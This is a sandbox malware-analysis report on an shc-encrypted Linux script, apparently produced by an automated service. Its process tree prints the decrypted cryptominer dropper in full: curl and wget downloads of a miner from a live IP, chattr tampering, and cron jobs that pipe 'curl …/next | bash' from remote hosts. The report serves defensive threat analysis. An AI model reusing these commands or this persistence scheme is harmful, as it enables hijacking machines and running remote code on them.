Analysis

  • max time kernel
    10s
  • max time network
    130s
  • platform
    ubuntu-18.04_amd64
  • resource
    ubuntu1804-amd64-20240611-en
  • resource tags

    arch:amd64
    arch:i386
    image:ubuntu1804-amd64-20240611-en
    kernel:4.15.0-213-generic
    locale:en-us
    os:ubuntu-18.04-amd64
    system
  • submitted
    26/11/2024, 12:41 UTC

General

  • Target

    样本/Linux/shc加密脚本/069AD3938C3F9C049F670A8EB49DC1D8

  • Size

    1023KB

  • MD5

    069ad3938c3f9c049f670a8eb49dc1d8

  • SHA1

    f4fd0c87a18d45ab4b642f32a94673c949ab7caf

  • SHA256

    84d4b99f0d98900b4eadb7e107bf54196f2e5796d8707ebf0dcd76f5b6693295

  • SHA512

    3c627883f53082face65b22d353c1926c4d4f4de008cf41cf2a3326762ad080dd95324f2fd35c3f60c069df4fb2c510d4fa07b26cbc404678f8a655c884beedb

  • SSDEEP

    12288:SBgtRmLBGYhFcueTIqRe/w/Yt6myOP7/x7L15k7bKrHNq9EnE:SQRmLBTFcueTIie/wgB/x7LFLNq9

Malware Config

Signatures

  • File and Directory Permissions Modification 1 TTPs 3 IoCs

    Adversaries may modify file or directory permissions to evade defenses.

  • Attempts to change immutable files 4 IoCs

    Modifies inode attributes on the filesystem to allow changing of immutable files.

  • Creates/modifies Cron job 1 TTPs 1 IoCs

    Cron allows running tasks on a schedule, and is commonly used for malware persistence.

  • Enumerates running processes

    Discovers information about currently running processes on the system

  • Reads CPU attributes 1 TTPs 2 IoCs
  • Reads runtime system information 64 IoCs

    Reads data from /proc virtual filesystem.

Processes

  • /tmp/样本/Linux/shc加密脚本/069AD3938C3F9C049F670A8EB49DC1D8
    /tmp/样本/Linux/shc加密脚本/069AD3938C3F9C049F670A8EB49DC1D8
    1⤵
      PID:1510
    • /bin/bash
      /tmp/样本/Linux/shc加密脚本/069AD3938C3F9C049F670A8EB49DC1D8 -c "exec '/tmp/样本/Linux/shc加密脚本/069AD3938C3F9C049F670A8EB49DC1D8' \"\$@\"" /tmp/样本/Linux/shc加密脚本/069AD3938C3F9C049F670A8EB49DC1D8
      1⤵
        PID:1510
      • /tmp/样本/Linux/shc加密脚本/069AD3938C3F9C049F670A8EB49DC1D8
        /tmp/样本/Linux/shc加密脚本/069AD3938C3F9C049F670A8EB49DC1D8
        1⤵
          PID:1510
        • /bin/bash
          /tmp/样本/Linux/shc加密脚本/069AD3938C3F9C049F670A8EB49DC1D8 -c " #!/bin/bash ifrunning=\$(pgrep xrx) ######################## ######################## downloadminer(){ link1=\"http://185.252.178.82:6972/xrx/xrx\" link2=\"http://185.252.178.82:6972/configs/config-xrx.json\" mkdir /var/tmp/.xrx cd /var/tmp/.xrx/ chattr -ia /var/tmp/.xrx/xrx chattr -ia /var/tmp/.xrx/config.json rm -rf /var/tmp/.xrx/xrx rm -rf /var/tmp/.xrx/config.json curl -L -O \$link1 || cd1 -L -O \$link1 || wget \$link1 --no-check-certificate curl -L -O \$link2 || cd1 -L -O \$link2 || wget \$link2 --no-check-certificate mv config-xrx.json config.json chmod +x /var/tmp/.xrx/xrx } ######################## ######################## crontablegend(){ if (( \$EUID != 0 )); then if ! crontab -l | grep -q 'secure'; then cd /dev/shm rm -rf /dev/shm/.spark echo \"@daily /var/tmp/.x/secure >/dev/null 2>&1 & disown \$* \" >> .spark sleep 1 echo \"@reboot /var/tmp/.x/secure >/dev/null 2>&1 & disown \$* \" >> .spark sleep 1 echo \"1 * * * * /var/tmp/.x/secure >/dev/null 2>&1 & disown \$* \" >> .spark sleep 1 echo \"*/30 * * * * curl 185.252.178.82:1011/next | bash \" >> .spark sleep 1 echo \"*/30 * * * * curl load.whitesnake.church:1011/next | bash \" >> .spark sleep 1 crontab .spark sleep 2 rm -rf /dev/shm/.spark fi fi if (( \$EUID == 0 )); then if ! 
cat /etc/crontab | grep -q 'secure'; then echo \"@daily root /var/tmp/.x/secure >/dev/null 2>&1 & disown \$* \" >> /etc/crontab echo \"@reboot root /var/tmp/.xrx/init.sh hide >/dev/null 2>&1 & disown \$* \" >> /etc/crontab echo \"1 * * * * root /var/tmp/.x/secure >/dev/null 2>&1 & disown \$* \" >> /etc/crontab echo \"*/30 * * * * root curl 185.252.178.82:1011/next | bash \" >> /etc/crontab echo \"*/30 * * * * root curl load.whitesnake.church:1011/next | bash \" >> /etc/crontab fi fi } ######################## ######################## gettingmineru(){ fsiz=`ls -l /var/tmp/.xrx/xrx | awk '{print \$5}'` if [ -f /var/tmp/.xrx/xrx ]; then echo \"miner intact\" else echo \"miner not found,downloading...\" downloadminer fi if [[ \"\$fsiz\" -gt 0 ]]; then echo \"miner size intact\" else echo \"filesize 0,downloading...\" downloadminer fi } ######################## ######################## gettingmineru crontablegend if test -z \"\$ifrunning\" ; then echo \"xrx not running,starting...\" /var/tmp/.xrx/xrx </dev/null &>/dev/null & disown -h %1 sleep 1 echo -e \"pid:\" pgrep xrx fi " /tmp/样本/Linux/shc加密脚本/069AD3938C3F9C049F670A8EB49DC1D8
          1⤵
          • File and Directory Permissions Modification
          • Creates/modifies Cron job
          PID:1510
          • /usr/bin/pgrep
            pgrep xrx
            2⤵
            • Reads CPU attributes
            • Reads runtime system information
            PID:1512
          • /usr/bin/awk
            awk "{print \$5}"
            2⤵
              PID:1515
            • /bin/ls
              ls -l /var/tmp/.xrx/xrx
              2⤵
              • Reads runtime system information
              PID:1514
            • /bin/mkdir
              mkdir /var/tmp/.xrx
              2⤵
                PID:1516
              • /usr/bin/chattr
                chattr -ia /var/tmp/.xrx/xrx
                2⤵
                • Attempts to change immutable files
                PID:1517
              • /usr/bin/chattr
                chattr -ia /var/tmp/.xrx/config.json
                2⤵
                • Attempts to change immutable files
                PID:1518
              • /bin/rm
                rm -rf /var/tmp/.xrx/xrx
                2⤵
                  PID:1519
                • /bin/rm
                  rm -rf /var/tmp/.xrx/config.json
                  2⤵
                    PID:1520
                  • /usr/bin/curl
                    curl -L -O http://185.252.178.82:6972/xrx/xrx
                    2⤵
                      PID:1521
                    • /usr/bin/wget
                      wget http://185.252.178.82:6972/xrx/xrx --no-check-certificate
                      2⤵
                        PID:1523
                      • /usr/bin/curl
                        curl -L -O http://185.252.178.82:6972/configs/config-xrx.json
                        2⤵
                          PID:1527
                        • /usr/bin/wget
                          wget http://185.252.178.82:6972/configs/config-xrx.json --no-check-certificate
                          2⤵
                            PID:1529
                          • /bin/mv
                            mv config-xrx.json config.json
                            2⤵
                              PID:1530
                            • /bin/chmod
                              chmod +x /var/tmp/.xrx/xrx
                              2⤵
                              • File and Directory Permissions Modification
                              PID:1531
                            • /bin/mkdir
                              mkdir /var/tmp/.xrx
                              2⤵
                                PID:1532
                              • /usr/bin/chattr
                                chattr -ia /var/tmp/.xrx/xrx
                                2⤵
                                • Attempts to change immutable files
                                PID:1533
                              • /usr/bin/chattr
                                chattr -ia /var/tmp/.xrx/config.json
                                2⤵
                                • Attempts to change immutable files
                                PID:1534
                              • /bin/rm
                                rm -rf /var/tmp/.xrx/xrx
                                2⤵
                                  PID:1535
                                • /bin/rm
                                  rm -rf /var/tmp/.xrx/config.json
                                  2⤵
                                    PID:1536
                                  • /usr/bin/curl
                                    curl -L -O http://185.252.178.82:6972/xrx/xrx
                                    2⤵
                                      PID:1537
                                    • /usr/bin/wget
                                      wget http://185.252.178.82:6972/xrx/xrx --no-check-certificate
                                      2⤵
                                        PID:1539
                                      • /usr/bin/curl
                                        curl -L -O http://185.252.178.82:6972/configs/config-xrx.json
                                        2⤵
                                          PID:1540
                                        • /usr/bin/wget
                                          wget http://185.252.178.82:6972/configs/config-xrx.json --no-check-certificate
                                          2⤵
                                            PID:1542
                                          • /bin/mv
                                            mv config-xrx.json config.json
                                            2⤵
                                              PID:1543
                                            • /bin/chmod
                                              chmod +x /var/tmp/.xrx/xrx
                                              2⤵
                                              • File and Directory Permissions Modification
                                              PID:1544
                                            • /bin/grep
                                              grep -q secure
                                              2⤵
                                                PID:1546
                                              • /bin/cat
                                                cat /etc/crontab
                                                2⤵
                                                  PID:1545
                                                • /bin/sleep
                                                  sleep 1
                                                  2⤵
                                                    PID:1548
                                                  • /var/tmp/.xrx/xrx
                                                    /var/tmp/.xrx/xrx
                                                    2⤵
                                                      PID:1547
                                                    • /usr/bin/pgrep
                                                      pgrep xrx
                                                      2⤵
                                                      • Reads CPU attributes
                                                      • Reads runtime system information
                                                      PID:1549

Network

  No results found
  • 185.252.178.82:6972
    60 B
    1
  • 185.252.178.82:6972
    60 B
    1
  • 185.125.188.61:443
    tls
    135 B
    2
  • 185.125.188.61:443
    tls
    135 B
    2
  • 151.101.193.91:443
    tls, https
    233 B
    40 B
    1
    1
  • 151.101.193.91:443
    extensions.gnome.org
    tls
    1.1kB
    5.4kB
    11
    14
  • 185.252.178.82:6972
    60 B
    1
  • 185.252.178.82:6972
    60 B
    1
  • 195.181.164.14:443
    tls, https
    35.0kB
    134
  • 185.252.178.82:6972
    60 B
    1
  • 185.252.178.82:6972
    60 B
    1
  • 185.252.178.82:6972
    120 B
    2
  • 185.252.178.82:6972
    240 B
    4
  • 224.0.0.251:5353
    146 B
    2

MITRE ATT&CK Enterprise v15
